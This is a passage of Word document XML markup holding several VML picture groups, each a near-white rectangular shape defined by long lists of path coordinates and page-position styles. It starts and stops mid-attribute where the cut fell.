path="m1975,8473l1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1975,8473,1976,8473,1976,8473,1976,8473,1976,8473,1976,8473,1976,8473,1976,8473,1976,8473,1977,8473,1977,8473,1977,8473,1977,8473,1977,8473,1978,8473,1978,8473,1978,8473,1978,8473,1979,8473,1979,8473,1979,8473,1980,8473,1980,8473,1980,8473,1981,8473,1981,8473,1981,8473,1982,8473,1982,8473,1983,8473,1983,8473,1984,8473,1984,8473,1985,8473,1986,8473,1986,8473,1987,8473,1988,8473,1988,8473,1989,8473,1990,8473,1990,8473,1991,8473,1992,8473,1993,8473,1994,8473,1995,8473,1995,8473,1996,8473,1997,8473,1998,8473,1999,8473,2000,8473,2002,8473,2003,8473,2004,8473,2005,8473,2006,8473,2008,8473,2009,8473,2010,8473,2011,8473,2013,8473,2014,8473,2016,8473,2017,8473,2019,8473,2020,8473,2022,8473,2024,8473,2025,8473,2027,8473,2029,8473,2030,8473,2032,8473,2034,8473,2036,8473,2038,8473,2040,8473,2042,8473,2044,8473,2046,8473,2048,8473,2051,8473,2053,8473,2055,8473,2057,8473,2060,8473,2062,8473,2065,8473,2067,8473,2070,8473,2072,8473,2075,8473,2078,8473,2081,8473,2083,8473,2086,8473,2089,8473,2092,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8474,2095,8474,2095,8474,2095,8474,2095,8474,2095,8474,2095,8474,2095,8474,2095,8474,2095,8475,2095,8475,2095,8475,2095,8475,2095,8476,2095,8476,2095,8476,2095,8477,2095,8477,2095,8477,2095,8478,2095,8478,2095,8479,2095,8479,2095,8480,2095,8480,2095,8481,2095,8482,2095,8482,2095,8483,2095,8484,2095,8484,2095,8485,2095,8486,2095,8487,2095,8488,2095,8489,2095,8490,2095,8491,2095,8492,2095,8493,2095,8495,2095,8496,2095,8497,2095,8498,2095,8500,2095,8501,2095,8503,2095,8504,2095,8506,2095,8508,2095,8509,2095,8511,2095,8513,2095,8515,2095,8517,2095,8519,2095,8521,2095,8523,2095,8525,2095,8527,2095,8530,2095,8532,2095,8535,2095,8537,2095,8540,2095,8542,2095,8545,2095,8548,2095,8551,2095,8554,2095,8557,2095,8560,2095,8563,2095,8566,2095,8570,2095,8573,2095,8576,2095,8580,2095,8584,2095,8587,2095,8591,2095,8595,2095,8599,2095,8603,2095,8607,2095,8611,2095,8616,2095,8620,2095,8625,2095,8629,2095,8634,2095,8639,2095,8644,2095,8649,2095,8654,2095,8659,2095,8664,2095,8669,2095,8675,2095,8680,2095,8686,2095,8692,2095,8698,2095,8704,2095,8710,2095,8716,2095,8722,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2094,8728,2094,8728,2094,8728,2094,8728,2094,8728,2094,8728,2094,8728,2094,8728,2093,8728,2093,8728,2093,8728,2093,8728,2093,8728,2092,8728,2092,8728,2092,8728,2092,8728,2091,8728,2091,8728,2091,8728,2090,8728,2090,8728,2090,8728,2089,8728,2089,8728,2089,8728,2088,8728,2088,8728,2087,8728,2087,8728,2086,8728,2086,8728,2085,8728,2084,8728,2084,8728,2083,8728,2083,8728,2082,8728,2081,8728,2080,8728,2080,8728,2079,8728,2078,8728,2077,8728,2076,8728,2075,8728,2075,8728,2074,8728,2073,8728,2072,8728,2071,8728,2070,8728,2068,8728,2067,8728,2066,8728,2065,8728,2064,8728,2063,8728,2061,8728,2060,8728,2059,8728,2057,8728,2056,8728,2054,8728,2053,8728,2051,8728,2050,8728,2048,8728,2047,8728,2045,8728,2043,8728,2041,8728,2040,8728,2038,8728,2036,8728,2034,8728,2032,8728,2030,8728,2028,8728,2026,8728,2024,8728,2022,8728,2019,8728,2017,8728,2015,8728,2013,8728,2010,8728,2008,8728,2005,8728,2003,8728,2000,8728,1998,8728,1995,8728,1992,8728,1990,8728,1987,8728,1984,8728,1981,8728,1978,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8728,1975,8727,1975,8727,1975,8727,1975,8727,1975,8727,1975,8726,1975,8726,1975,8726,1975,8725,1975,8725,1975,8725,1975,8724,1975,8724,1975,8723,1975,8723,1975,8722,1975,8722,1975,8721,1975,8721,1975,8720,1975,8719,1975,8719,1975,8718,1975,8717,1975,8716,1975,8716,1975,8715,1975,8714,1975,8713,1975,8712,1975,8711,1975,8709,1975,8708,1975,8707,1975,8706,1975,8705,1975,8703,1975,8702,1975,8700,1975,8699,1975,8697,1975,8696,1975,8694,1975,8692,1975,8691,1975,8689,1975,8687,1975,8685,1975,8683,1975,8681,1975,8679,1975,8676,1975,8674,1975,8672,1975,8670,1975,8667,1975,8665,1975,8662,1975,8659,1975,8657,1975,8654,1975,8651,1975,8648,1975,8645,1975,8642,1975,8639,1975,8635,1975,8632,1975,8629,1975,8625,1975,8622,1975,8618,1975,8614,1975,8611,1975,8607,1975,8603,1975,8599,1975,8594,1975,8590,1975,8586,1975,8581,1975,8577,1975,8572,1975,8568,1975,8563,1975,8558,1975,8553,1975,8548,1975,8543,1975,8538,1975,8532,1975,8527,1975,8521,1975,8516,1975,8510,1975,8504,1975,8498,1975,8492,1975,8486,1975,8480,1975,8473e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:422.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,8450" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:8450;width:130;height:270" coordorigin="2070,8450" coordsize="130,270" path="m2095,8473l2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2095,8473,2096,8473,2096,8473,2096,8473,2096,8473,2096,8473,2096,8473,2096,8473,2096,8473,2096,8473,2097,8473,2097,8473,2097,8473,2097,8473,2097,8473,2098,8473,2098,8473,2098,8473,2098,8473,2099,8473,2099,8473,2099,8473,2100,8473,2100,8473,2100,8473,2101,8473,2101,8473,2102,8473,2102,8473,2102,8473,2103,8473,2103,8473,2104,8473,2105,8473,2105,8473,2106,8473,2106,8473,2107,8473,2108,8473,2108,8473,2109,8473,2110,8473,2110,8473,2111,8473,2112,8473,2113,8473,2114,8473,2115,8473,2116,8473,2116,8473,2117,8473,2118,8473,2119,8473,2121,8473,2122,8473,2123,8473,2124,8473,2125,8473,2126,8473,2128,8473,2129,8473,2130,8473,2132,8473,2133,8473,2134,8473,2136,8473,2137,8473,2139,8473,2140,8473,2142,8473,2144,8473,2145,8473,2147,8473,2149,8473,2151,8473,2152,8473,2154,8473,2156,8473,2158,8473,2160,8473,2162,8473,2164,8473,2166,8473,2168,8473,2171,8473,2173,8473,2175,8473,2178,8473,2180,8473,2182,8473,2185,8473,2187,8473,2190,8473,2192,8473,2195,8473,2198,8473,2201,8473,2203,8473,2206,8473,2209,8473,2212,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8473,2215,8474,2215,8474,2215,8474,2215,8474,2215,8474,2215,8474,2215,8474,2215,8474,2215,8474,2215,8475,2215,8475,2215,8475,2215,8475,2215,8476,2215,8476,2215,8476,2215,8477,2215,8477,2215,8477,2215,8478,2215,8478,2215,8479,2215,8479,2215,8480,2215,8480,2215,8481,2215,8482,2215,8482,2215,8483,2215,8484,2215,8484,2215,8485,2215,8486,2215,8487,2215,8488,2215,8489,2215,8490,2215,8491,2215,8492,2215,8493,2215,8495,2215,8496,2215,8497,2215,8498,2215,8500,2215,8501,2215,8503,2215,8504,2215,8506,2215,8508,2215,8509,2215,8511,2215,8513,2215,8515,2215,8517,2215,8519,2215,8521,2215,8523,2215,8525,2215,8527,2215,8530,2215,8532,2215,8535,2215,8537,2215,8540,2215,8542,2215,8545,2215,8548,2215,8551,2215,8554,2215,8557,2215,8560,2215,8563,2215,8566,2215,8570,2215,8573,2215,8576,2215,8580,2215,8584,2215,8587,2215,8591,2215,8595,2215,8599,2215,8603,2215,8607,2215,8611,2215,8616,2215,8620,2215,8625,2215,8629,2215,8634,2215,8639,2215,8644,2215,8649,2215,8654,2215,8659,2215,8664,2215,8669,2215,8675,2215,8680,2215,8686,2215,8692,2215,8698,2215,8704,2215,8710,2215,8716,2215,8722,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2215,8728,2214,8728,2214,8728,2214,8728,2214,8728,2214,8728,2214,8728,2214,8728,2214,8728,2213,8728,2213,8728,2213,8728,2213,8728,2213,8728,2212,8728,2212,8728,2212,8728,2212,8728,2211,8728,2211,8728,2211,8728,2210,8728,2210,8728,2209,8728,2209,8728,2209,8728,2208,8728,2208,8728,2207,8728,2207,8728,2206,8728,2206,8728,2205,8728,2205,8728,2204,8728,2203,8728,2203,8728,2202,8728,2201,8728,2200,8728,2200,8728,2199,8728,2198,8728,2197,8728,2196,8728,2196,8728,2195,8728,2194,8728,2193,8728,2192,8728,2191,8728,2190,8728,2189,8728,2187,8728,2186,8728,2185,8728,2184,8728,2183,8728,2181,8728,2180,8728,2179,8728,2177,8728,2176,8728,2174,8728,2173,8728,2171,8728,2170,8728,2168,8728,2167,8728,2165,8728,2163,8728,2161,8728,2160,8728,2158,8728,2156,8728,2154,8728,2152,8728,2150,8728,2148,8728,2146,8728,2144,8728,2142,8728,2140,8728,2137,8728,2135,8728,2133,8728,2130,8728,2128,8728,2125,8728,2123,8728,2120,8728,2118,8728,2115,8728,2112,8728,2110,8728,2107,8728,2104,8728,2101,8728,2098,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8728,2095,8727,2095,8727,2095,8727,2095,8727,2095,8727,2095,8726,2095,8726,2095,8726,2095,8725,2095,8725,2095,8725,2095,8724,2095,8724,2095,8723,2095,8723,2095,8722,2095,8722,2095,8721,2095,8721,2095,8720,2095,8719,2095,8719,2095,8718,2095,8717,2095,8716,2095,8716,2095,8715,2095,8714,2095,8713,2095,8712,2095,8711,2095,8709,2095,8708,2095,8707,2095,8706,2095,8705,2095,8703,2095,8702,2095,8700,2095,8699,2095,8697,2095,8696,2095,8694,2095,8692,2095,8691,2095,8689,2095,8687,2095,8685,2095,8683,2095,8681,2095,8679,2095,8676,2095,8674,2095,8672,2095,8670,2095,8667,2095,8665,2095,8662,2095,8659,2095,8657,2095,8654,2095,8651,2095,8648,2095,8645,2095,8642,2095,8639,2095,8635,2095,8632,2095,8629,2095,8625,2095,8622,2095,8618,2095,8614,2095,8611,2095,8607,2095,8603,2095,8599,2095,8594,2095,8590,2095,8586,2095,8581,2095,8577,2095,8572,2095,8568,2095,8563,2095,8558,2095,8553,2095,8548,2095,8543,2095,8538,2095,8532,2095,8527,2095,8521,2095,8516,2095,8510,2095,8504,2095,8498,2095,8492,2095,8486,2095,8480,2095,8473e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:531.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,10630" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:10630;width:130;height:270" coordorigin="3130,10630" coordsize="130,270" path="m3146,10649l3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3146,10649,3147,10649,3147,10649,3147,10649,3147,10649,3147,10649,3147,10649,3148,10649,3148,10649,3148,10649,3148,10649,3148,10649,3149,10649,3149,10649,3149,10649,3149,10649,3150,10649,3150,10649,3150,10649,3151,10649,3151,10649,3152,10649,3152,10649,3153,10649,3153,10649,3153,10649,3154,10649,3154,10649,3155,10649,3156,10649,3156,10649,3157,10649,3157,10649,3158,10649,3159,10649,3159,10649,3160,10649,3161,10649,3162,10649,3163,10649,3163,10649,3164,10649,3165,10649,3166,10649,3167,10649,3168,10649,3169,10649,3170,10649,3171,10649,3172,10649,3173,10649,3174,10649,3176,10649,3177,10649,3178,10649,3179,10649,3181,10649,3182,10649,3183,10649,3185,10649,3186,10649,3188,10649,3189,10649,3191,10649,3192,10649,3194,10649,3196,10649,3198,10649,3199,10649,3201,10649,3203,10649,3205,10649,3207,10649,3209,10649,3211,10649,3213,10649,3215,10649,3217,10649,3219,10649,3221,10649,3223,10649,3226,10649,3228,10649,3230,10649,3233,10649,3235,10649,3238,10649,3240,10649,3243,10649,3246,10649,3248,10649,3251,10649,3254,10649,3257,10649,3260,10649,3263,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10649,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10650,3266,10651,3266,10651,3266,10651,3266,10651,3266,10651,3266,10652,3266,10652,3266,10652,3266,10653,3266,10653,3266,10653,3266,10654,3266,10654,3266,10655,3266,10655,3266,10656,3266,10656,3266,10657,3266,10658,3266,10658,3266,10659,3266,10660,3266,10661,3266,10661,3266,10662,3266,10663,3266,10664,3266,10665,3266,10666,3266,10667,3266,10668,3266,10669,3266,10671,3266,10672,3266,10673,3266,10675,3266,10676,3266,10677,3266,10679,3266,10680,3266,10682,3266,10684,3266,10685,3266,10687,3266,10689,3266,10691,3266,10693,3266,10695,3266,10697,3266,10699,3266,10701,3266,10704,3266,10706,3266,10708,3266,10711,3266,10713,3266,10716,3266,10718,3266,10721,3266,10724,3266,10727,3266,10730,3266,10733,3266,10736,3266,10739,3266,10742,3266,10746,3266,10749,3266,10753,3266,10756,3266,10760,3266,10763,3266,10767,3266,10771,3266,10775,3266,10779,3266,10783,3266,10788,3266,10792,3266,10796,3266,10801,3266,10805,3266,10810,3266,10815,3266,10820,3266,10825,3266,10830,3266,10835,3266,10840,3266,10845,3266,10851,3266,10856,3266,10862,3266,10868,3266,10874,3266,10880,3266,10886,3266,10892,3266,10898,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3266,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3265,10904,3264,10904,3264,10904,3264,10904,3264,10904,3264,10904,3264,10904,3263,10904,3263,10904,3263,10904,3263,10904,3262,10904,3262,10904,3262,10904,3261,10904,3261,10904,3261,10904,3260,10904,3260,10904,3260,10904,3259,10904,3259,10904,3258,10904,3258,10904,3257,10904,3257,10904,3256,10904,3256,10904,3255,10904,3254,10904,3254,10904,3253,10904,3252,10904,3252,10904,3251,10904,3250,10904,3249,10904,3249,10904,3248,10904,3247,10904,3246,10904,3245,10904,3244,10904,3243,10904,3242,10904,3241,10904,3240,10904,3239,10904,3238,10904,3237,10904,3236,10904,3234,10904,3233,10904,3232,10904,3231,10904,3229,10904,3228,10904,3226,10904,3225,10904,3223,10904,3222,10904,3220,10904,3219,10904,3217,10904,3215,10904,3214,10904,3212,10904,3210,10904,3208,10904,3206,10904,3205,10904,3203,10904,3201,10904,3199,10904,3197,10904,3194,10904,3192,10904,3190,10904,3188,10904,3186,10904,3183,10904,3181,10904,3178,10904,3176,10904,3173,10904,3171,10904,3168,10904,3166,10904,3163,10904,3160,10904,3157,10904,3154,10904,3152,10904,3149,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10904,3146,10903,3146,10903,3146,10903,3146,10903,3146,10903,3146,10902,3146,10902,3146,10902,3146,10902,3146,10901,3146,10901,3146,10900,3146,10900,3146,10900,3146,10899,3146,10899,3146,10898,3146,10897,3146,10897,3146,10896,3146,10896,3146,10895,3146,10894,3146,10893,3146,10892,3146,10892,3146,10891,3146,10890,3146,10889,3146,10888,3146,10887,3146,10886,3146,10884,3146,10883,3146,10882,3146,10881,3146,10879,3146,10878,3146,10876,3146,10875,3146,10873,3146,10872,3146,10870,3146,10868,3146,10867,3146,10865,3146,10863,3146,10861,3146,10859,3146,10857,3146,10855,3146,10853,3146,10850,3146,10848,3146,10846,3146,10843,3146,10841,3146,10838,3146,10835,3146,10833,3146,10830,3146,10827,3146,10824,3146,10821,3146,10818,3146,10815,3146,10812,3146,10808,3146,10805,3146,10801,3146,10798,3146,10794,3146,10790,3146,10787,3146,10783,3146,10779,3146,10775,3146,10771,3146,10766,3146,10762,3146,10758,3146,10753,3146,10749,3146,10744,3146,10739,3146,10734,3146,10729,3146,10724,3146,10719,3146,10714,3146,10708,3146,10703,3146,10697,3146,10692,3146,10686,3146,10680,3146,10674,3146,10668,3146,10662,3146,10656,3146,10649e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:549.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,10990" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:10990;width:130;height:270" coordorigin="3490,10990" coordsize="130,270" path="m3506,11010l3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3506,11010,3507,11010,3507,11010,3507,11010,3507,11010,3507,11010,3507,11010,3507,11010,3508,11010,3508,11010,3508,11010,3508,11010,3508,11010,3509,11010,3509,11010,3509,11010,3509,11010,3510,11010,3510,11010,3510,11010,3511,11010,3511,11010,3511,11010,3512,11010,3512,11010,3513,11010,3513,11010,3514,11010,3514,11010,3515,11010,3515,11010,3516,11010,3516,11010,3517,11010,3518,11010,3518,11010,3519,11010,3520,11010,3520,11010,3521,11010,3522,11010,3523,11010,3524,11010,3524,11010,3525,11010,3526,11010,3527,11010,3528,11010,3529,11010,3530,11010,3531,11010,3532,11010,3533,11010,3535,11010,3536,11010,3537,11010,3538,11010,3540,11010,3541,11010,3542,11010,3544,11010,3545,11010,3547,11010,3548,11010,3550,11010,3551,11010,3553,11010,3554,11010,3556,11010,3558,11010,3559,11010,3561,11010,3563,11010,3565,11010,3567,11010,3569,11010,3571,11010,3573,11010,3575,11010,3577,11010,3579,11010,3581,11010,3584,11010,3586,11010,3588,11010,3591,11010,3593,11010,3596,11010,3598,11010,3601,11010,3603,11010,3606,11010,3609,11010,3611,11010,3614,11010,3617,11010,3620,11010,3623,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11010,3626,11011,3626,11011,3626,11011,3626,11011,3626,11011,3626,11012,3626,11012,3626,11012,3626,11013,3626,11013,3626,11013,3626,11014,3626,11014,3626,11015,3626,11015,3626,11015,3626,11016,3626,11017,3626,11017,3626,11018,3626,11019,3626,11019,3626,11020,3626,11021,3626,11022,3626,11022,3626,11023,3626,11024,3626,11025,3626,11026,3626,11027,3626,11028,3626,11030,3626,11031,3626,11032,3626,11033,3626,11035,3626,11036,3626,11038,3626,11039,3626,11041,3626,11042,3626,11044,3626,11046,3626,11047,3626,11049,3626,11051,3626,11053,3626,11055,3626,11057,3626,11059,3626,11061,3626,11064,3626,11066,3626,11068,3626,11071,3626,11073,3626,11076,3626,11079,3626,11081,3626,11084,3626,11087,3626,11090,3626,11093,3626,11096,3626,11099,3626,11103,3626,11106,3626,11109,3626,11113,3626,11116,3626,11120,3626,11124,3626,11127,3626,11131,3626,11135,3626,11139,3626,11143,3626,11148,3626,11152,3626,11156,3626,11161,3626,11166,3626,11170,3626,11175,3626,11180,3626,11185,3626,11190,3626,11195,3626,11200,3626,11206,3626,11211,3626,11217,3626,11222,3626,11228,3626,11234,3626,11240,3626,11246,3626,11252,3626,11258,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3626,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3625,11265,3624,11265,3624,11265,3624,11265,3624,11265,3624,11265,3623,11265,3623,11265,3623,11265,3623,11265,3623,11265,3622,11265,3622,11265,3622,11265,3621,11265,3621,11265,3621,11265,3620,11265,3620,11265,3619,11265,3619,11265,3618,11265,3618,11265,3617,11265,3617,11265,3616,11265,3616,11265,3615,11265,3615,11265,3614,11265,3613,11265,3613,11265,3612,11265,3611,11265,3610,11265,3610,11265,3609,11265,3608,11265,3607,11265,3606,11265,3605,11265,3604,11265,3603,11265,3602,11265,3601,11265,3600,11265,3599,11265,3598,11265,3597,11265,3596,11265,3595,11265,3593,11265,3592,11265,3591,11265,3589,11265,3588,11265,3587,11265,3585,11265,3584,11265,3582,11265,3581,11265,3579,11265,3577,11265,3576,11265,3574,11265,3572,11265,3570,11265,3569,11265,3567,11265,3565,11265,3563,11265,3561,11265,3559,11265,3557,11265,3555,11265,3552,11265,3550,11265,3548,11265,3546,11265,3543,11265,3541,11265,3539,11265,3536,11265,3534,11265,3531,11265,3528,11265,3526,11265,3523,11265,3520,11265,3517,11265,3515,11265,3512,11265,3509,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11265,3506,11264,3506,11264,3506,11264,3506,11264,3506,11264,3506,11264,3506,11264,3506,11264,3506,11264,3506,11263,3506,11263,3506,11263,3506,11263,3506,11263,3506,11262,3506,11262,3506,11262,3506,11261,3506,11261,3506,11261,3506,11260,3506,11260,3506,11259,3506,11259,3506,11258,3506,11258,3506,11257,3506,11256,3506,11256,3506,11255,3506,11254,3506,11253,3506,11253,3506,11252,3506,11251,3506,11250,3506,11249,3506,11248,3506,11247,3506,11246,3506,11245,3506,11243,3506,11242,3506,11241,3506,11239,3506,11238,3506,11237,3506,11235,3506,11234,3506,11232,3506,11230,3506,11229,3506,11227,3506,11225,3506,11223,3506,11221,3506,11219,3506,11217,3506,11215,3506,11213,3506,11210,3506,11208,3506,11206,3506,11203,3506,11201,3506,11198,3506,11196,3506,11193,3506,11190,3506,11187,3506,11184,3506,11181,3506,11178,3506,11175,3506,11172,3506,11168,3506,11165,3506,11162,3506,11158,3506,11154,3506,11151,3506,11147,3506,11143,3506,11139,3506,11135,3506,11131,3506,11127,3506,11122,3506,11118,3506,11113,3506,11109,3506,11104,3506,11099,3506,11094,3506,11089,3506,11084,3506,11079,3506,11074,3506,11069,3506,11063,3506,11058,3506,11052,3506,11046,3506,11040,3506,11034,3506,11028,3506,11022,3506,11016,3506,11010e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:568.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,11370" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:11370;width:130;height:270" coordorigin="3010,11370" coordsize="130,270" path="m3026,11385l3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3026,11385,3027,11385,3027,11385,3027,11385,3027,11385,3027,11385,3027,11385,3027,11385,3028,11385,3028,11385,3028,11385,3028,11385,3029,11385,3029,11385,3029,11385,3029,11385,3030,11385,3030,11385,3030,11385,3031,11385,3031,11385,3032,11385,3032,11385,3032,11385,3033,11385,3033,11385,3034,11385,3034,11385,3035,11385,3036,11385,3036,11385,3037,11385,3037,11385,3038,11385,3039,11385,3039,11385,3040,11385,3041,11385,3042,11385,3043,11385,3043,11385,3044,11385,3045,11385,3046,11385,3047,11385,3048,11385,3049,11385,3050,11385,3051,11385,3052,11385,3053,11385,3054,11385,3056,11385,3057,11385,3058,11385,3059,11385,3061,11385,3062,11385,3063,11385,3065,11385,3066,11385,3068,11385,3069,11385,3071,11385,3072,11385,3074,11385,3076,11385,3077,11385,3079,11385,3081,11385,3083,11385,3085,11385,3087,11385,3089,11385,3091,11385,3093,11385,3095,11385,3097,11385,3099,11385,3101,11385,3103,11385,3106,11385,3108,11385,3110,11385,3113,11385,3115,11385,3118,11385,3120,11385,3123,11385,3126,11385,3128,11385,3131,11385,3134,11385,3137,11385,3140,11385,3143,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11385,3146,11386,3146,11386,3146,11386,3146,11386,3146,11386,3146,11387,3146,11387,3146,11387,3146,11387,3146,11388,3146,11388,3146,11388,3146,11389,3146,11389,3146,11390,3146,11390,3146,11391,3146,11391,3146,11392,3146,11392,3146,11393,3146,11394,3146,11394,3146,11395,3146,11396,3146,11397,3146,11398,3146,11399,3146,11399,3146,11400,3146,11401,3146,11403,3146,11404,3146,11405,3146,11406,3146,11407,3146,11409,3146,11410,3146,11411,3146,11413,3146,11414,3146,11416,3146,11417,3146,11419,3146,11421,3146,11423,3146,11424,3146,11426,3146,11428,3146,11430,3146,11432,3146,11434,3146,11437,3146,11439,3146,11441,3146,11444,3146,11446,3146,11449,3146,11451,3146,11454,3146,11457,3146,11459,3146,11462,3146,11465,3146,11468,3146,11471,3146,11474,3146,11478,3146,11481,3146,11484,3146,11488,3146,11491,3146,11495,3146,11499,3146,11503,3146,11507,3146,11510,3146,11515,3146,11519,3146,11523,3146,11527,3146,11532,3146,11536,3146,11541,3146,11545,3146,11550,3146,11555,3146,11560,3146,11565,3146,11570,3146,11575,3146,11581,3146,11586,3146,11592,3146,11597,3146,11603,3146,11609,3146,11615,3146,11621,3146,11627,3146,11633,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3146,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3145,11640,3144,11640,3144,11640,3144,11640,3144,11640,3144,11640,3144,11640,3143,11640,3143,11640,3143,11640,3143,11640,3143,11640,3142,11640,3142,11640,3142,11640,3141,11640,3141,11640,3141,11640,3140,11640,3140,11640,3140,11640,3139,11640,3139,11640,3138,11640,3138,11640,3137,11640,3137,11640,3136,11640,3136,11640,3135,11640,3134,11640,3134,11640,3133,11640,3132,11640,3132,11640,3131,11640,3130,11640,3129,11640,3129,11640,3128,11640,3127,11640,3126,11640,3125,11640,3124,11640,3123,11640,3122,11640,3121,11640,3120,11640,3119,11640,3118,11640,3117,11640,3116,11640,3114,11640,3113,11640,3112,11640,3110,11640,3109,11640,3108,11640,3106,11640,3105,11640,3103,11640,3102,11640,3100,11640,3099,11640,3097,11640,3095,11640,3094,11640,3092,11640,3090,11640,3088,11640,3086,11640,3084,11640,3083,11640,3081,11640,3079,11640,3076,11640,3074,11640,3072,11640,3070,11640,3068,11640,3065,11640,3063,11640,3061,11640,3058,11640,3056,11640,3053,11640,3051,11640,3048,11640,3045,11640,3043,11640,3040,11640,3037,11640,3034,11640,3031,11640,3029,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11640,3026,11639,3026,11639,3026,11639,3026,11639,3026,11639,3026,11639,3026,11639,3026,11638,3026,11638,3026,11638,3026,11638,3026,11638,3026,11637,3026,11637,3026,11637,3026,11636,3026,11636,3026,11635,3026,11635,3026,11634,3026,11634,3026,11633,3026,11633,3026,11632,3026,11632,3026,11631,3026,11630,3026,11629,3026,11629,3026,11628,3026,11627,3026,11626,3026,11625,3026,11624,3026,11623,3026,11622,3026,11621,3026,11620,3026,11619,3026,11617,3026,11616,3026,11615,3026,11613,3026,11612,3026,11610,3026,1160